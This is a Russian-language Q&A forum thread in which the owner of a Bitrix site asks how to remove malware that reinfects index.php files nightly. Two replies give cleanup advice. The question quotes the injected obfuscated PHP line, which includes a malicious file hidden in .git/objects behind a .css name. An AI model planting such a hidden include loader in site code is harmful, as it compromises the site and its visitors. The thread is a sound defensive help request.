Задать вопрос
@allgenl

Вирус на сайте добавляет строки в index.php по всем директориям. Как избавиться?

Пример кода, который добавляет вирус в файл index.php:
/*bc657*/
$r8 = "/ho\x6de3/login/public_ht\x6dl/.git/objects/34/.28e85653.css"; $trxc61 = substr($r8, 0); @include_once /* nk */ ($trxc61);
/*bc657*/


При наличии данного кода в используемых файлах возникают ошибки и страница не открывается. В самом коде видно что прописывается путь к файлу, который является вредоносным. После его удаления файл создаётся в другой папке .git/objects/

Ранее вирус также во многих директориях создал .htaccess. Я удалил их все. Сейчас только основной. Сканил сайт айболитом, удалял вредоносные файлы. Опять появляются.

Также помимо этого приходит куча запросов к папкам и файлам Wordpress, хотя сайт на Битриксе. Таких запросов бывает до 1000 за буквально 5 минут. Если блокирую один IP, начинают приходить с другого.

Сама подмена происходит раз в сутки, обычно ночью, в разное время.
  • Вопрос задан
  • 222 просмотра
Подписаться 1 Средний 3 комментария
Пригласить эксперта
Ответы на вопрос 2
pLavrenov
@pLavrenov
Разработка сайтов
Точных указаний что делать в этом случае нет, каждый сайт смотрится и решения там комплексные.

Блокировкой адресов может заниматься fail2ban без твоего участия.

Если что-то происходит каждый день и в одно и тоже время - первое что надо смотреть это крон в панели хостинга. Если там что-то есть то этот дырявый хостинг отправляется в мусорку и сайт переносится на reg.ru (никаких реклам, просто не вижу причин выбирать что-то кроме него)

На папки вордпреса идут запросы потому что скрипт комплексный.

Виной может быть нуленый плагин (или как там оно называется в этом овне), в админке есть проверка на целостность ее надо сделать в первую очередь.
Ответ написан
Комментировать
1. Делаете дампы файлов и бд, разворачиваете их у себя локально
2. В кастомных сущностях (папки/файлы шаблона, компонентов) вычищаете все подозрительное, зараженное
3. В бд вычищаете все подозрительное
4. Локально разворачиваете чистый битрикс
5. Переносите свои кастомные сущности в чистую установку
6. Подключаете очищенную бд к сайту
7. Смотрите работу сайта

Если все ок, то переносите чистые файлы и базу на основной сервер.
Далее меняете доступы к админке, базе, хостингу (серверу).

Если не ок, то возвращаемся к п2
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы